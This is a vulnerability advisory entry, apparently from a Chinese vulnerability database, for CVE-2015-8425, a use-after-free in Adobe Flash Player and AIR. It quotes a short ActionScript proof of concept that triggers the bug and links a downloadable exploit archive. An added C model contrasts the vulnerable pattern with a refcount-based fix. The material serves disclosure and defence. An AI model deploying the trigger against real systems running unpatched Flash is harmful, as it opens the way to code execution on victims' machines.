Use-after-free vulnerability in multiple Adobe products

Vulnerability ID: 1123157    Vulnerability type: Other
Published: 2015-12-18    Updated: 2015-12-18
CVE ID: CVE-2015-8425    CNNVD ID: CNNVD-201512-255
Platform: Windows    CVSS score: 10.0
|Vulnerability sources
https://www.exploit-db.com/exploits/39049
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201512-255
|Vulnerability details
Adobe Flash Player, Adobe AIR SDK and Adobe AIR SDK & Compiler are products of the US company Adobe. Adobe Flash Player is a multimedia player; Adobe AIR SDK and Adobe AIR SDK & Compiler are the standard development kits for Adobe AIR, a cross-platform runtime environment. A use-after-free vulnerability exists in multiple Adobe products. An attacker who exploits it can execute arbitrary code and take control of the affected system. The following products and versions are affected:
Adobe Flash Player Desktop Runtime 19.0.0.245 and earlier, and Adobe Flash Player Extended Support Release 18.0.0.261 and earlier, on Windows and Macintosh;
Adobe Flash Player for Google Chrome 19.0.0.245 and earlier on Windows, Macintosh, Linux and ChromeOS;
Adobe Flash Player for Microsoft Edge and Internet Explorer 11 19.0.0.245 and earlier on Windows 10;
Adobe Flash Player for Internet Explorer 10 and 11 19.0.0.245 and earlier on Windows 8.0 and 8.1;
Adobe Flash Player for Linux 11.2.202.548 and earlier on Linux;
AIR Desktop Runtime 19.0.0.241 and earlier on Windows and Macintosh;
AIR SDK 19.0.0.241 and earlier, and AIR SDK & Compiler 19.0.0.241 and earlier, on Windows, Macintosh, Android and iOS;
AIR for Android 19.0.0.241 and earlier on Android.
|Exploit (EXP)
Source: https://code.google.com/p/google-security-research/issues/detail?id=583

If a TextField variable is set to a value with toString defined, and the TextField is updated, a use-after-free can occur if the toString method frees the TextField's parent. A minimal PoC is as follows:

// Create a parent MovieClip and a TextField inside it.
var mc = this.createEmptyMovieClip("mc", 301);
var my_txt = mc.createTextField("my_txt", 302, 0, 0, 100, 100);
trace(my_txt);

// Bind the field's displayed text to the variable today_date on its parent (mc).
my_txt.variable = "today_date";
mc.today_date = "blah";
var times = 0;

// Every 500 ms, replace the bound variable with an object whose toString
// runs script when the TextField is refreshed.
var date_interval:Number = setInterval(updateDate, 500);

function updateDate() {
    mc.today_date = {toString : func};
}

// Called while the TextField is being updated: on the first call it removes
// mc, the field's parent, before returning the string to display.
function func() {
    if (times == 0) {
        times++;
        mc.removeMovieClip();
    }
    return "test";
}

A sample fla and swf are attached.


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39049.zip
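To show the shape of the bug the PoC above triggers, and the engine-side pattern that closes it, here is an added example in C written for this page. It is not Flash Player's code: `MovieClip`, `TextField`, the refcount, the poison fill and `run_poc` are hypothetical stand-ins for the real display objects and heap. The vulnerable update caches the parent pointer, calls into script (the `toString` hook), then dereferences the cached pointer; the hardened update holds a reference across the call and re-checks whether the parent was removed before rendering.

```c
#include <stdio.h>
#include <string.h>

/* Added illustrative model of the bug class in the PoC above; it is not Flash Player
 * code and every name is hypothetical. Lifetime is simulated with a refcount and a
 * poison fill instead of malloc/free so the read from "freed" storage is observable. */

enum { NAME_LEN = 16 };

typedef struct MovieClip {
    int refcount;        /* strong references held by the engine */
    int removed;         /* removeMovieClip() took it off the display list */
    int freed;           /* last reference dropped: storage is invalid */
    char name[NAME_LEN]; /* filled with 'X' on free, standing in for reused heap data */
} MovieClip;

typedef struct TextField { MovieClip *parent; } TextField; /* raw back-pointer that dangles */

/* Script-side toString hook; it may run arbitrary script, including removing parent. */
typedef const char *(*ToStringFn)(MovieClip *parent, int *times);

static MovieClip g_mc;  /* the clip the PoC calls mc */
static char g_out[64];  /* text the field last rendered */

static void clip_init(MovieClip *c, const char *name) {
    memset(c, 0, sizeof *c);
    c->refcount = 1;     /* the display list's reference */
    snprintf(c->name, sizeof c->name, "%s", name);
}
static void clip_retain(MovieClip *c) { c->refcount++; }
static void clip_release(MovieClip *c) {
    if (--c->refcount == 0) {            /* simulated free(): poison and mark dead */
        memset(c->name, 'X', NAME_LEN - 1);
        c->name[NAME_LEN - 1] = '\0';
        c->freed = 1;
    }
}
/* removeMovieClip(): the display list drops its reference; with no other holder it dies here. */
static void remove_movie_clip(MovieClip *c) { c->removed = 1; clip_release(c); }

/* Mirrors func() in the PoC: the first call removes the field's parent; every call returns "test". */
const char *freeing_to_string(MovieClip *parent, int *times) {
    if ((*times)++ == 0) remove_movie_clip(parent);
    return "test";
}
/* A well-behaved toString for comparison. */
const char *benign_to_string(MovieClip *parent, int *times) { (void)parent; (void)times; return "test"; }

/* Vulnerable shape: cache the parent, re-enter script, then use the cached pointer.
 * Always returns 1: it renders even when the storage it reads was freed. */
int textfield_update_vulnerable(TextField *tf, ToStringFn to_string, int *times) {
    MovieClip *parent = tf->parent;
    const char *s = to_string(parent, times);                /* may free parent */
    snprintf(g_out, sizeof g_out, "%s.%s", parent->name, s); /* use-after-free read */
    return 1;
}

/* Hardened shape: hold a reference across the re-entrant call and re-validate before
 * touching the object. Returns 1 if it rendered, 0 if the parent went away. */
int textfield_update_fixed(TextField *tf, ToStringFn to_string, int *times) {
    MovieClip *parent = tf->parent;
    int rendered = 0;
    if (parent == NULL) { g_out[0] = '\0'; return 0; }
    clip_retain(parent);                                     /* cannot be freed under us now */
    const char *s = to_string(parent, times);
    if (!parent->removed) {
        snprintf(g_out, sizeof g_out, "%s.%s", parent->name, s);
        rendered = 1;
    } else {
        g_out[0] = '\0';
        tf->parent = NULL;                                   /* drop the back-pointer first */
    }
    clip_release(parent);                                    /* may free it; nothing touches it after */
    return rendered;
}

/* Drives the PoC against one implementation: two interval ticks, the first of which frees
 * mc from inside toString. Returns how many ticks rendered text. */
int run_poc(int hardened, ToStringFn to_string) {
    TextField my_txt;
    int times = 0, rendered = 0, tick;
    clip_init(&g_mc, "mc");
    my_txt.parent = &g_mc;
    for (tick = 0; tick < 2; tick++)
        rendered += hardened ? textfield_update_fixed(&my_txt, to_string, &times)
                             : textfield_update_vulnerable(&my_txt, to_string, &times);
    return rendered;
}
const char *poc_output(void) { return g_out; }
int poc_parent_freed(void) { return g_mc.freed; }

int main(void) {
    printf("vulnerable: rendered %d tick(s), text \"%s\"\n", run_poc(0, freeing_to_string), poc_output());
    printf("fixed:      rendered %d tick(s), text \"%s\"\n", run_poc(1, freeing_to_string), poc_output());
    return 0;
}
```

With the freeing `toString`, the vulnerable update renders the poison fill (what a real heap would hand back as attacker-controlled reallocated data) on both ticks, while the hardened update renders nothing, clears its back-pointer, and still lets the clip die once its extra reference is released, so the fix neither dereferences freed storage nor leaks the object. With the benign `toString` both variants render `mc.test` normally.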
|References

Source: helpx.adobe.com
Link: https://helpx.adobe.com/security/products/flash-player/apsb15-32.html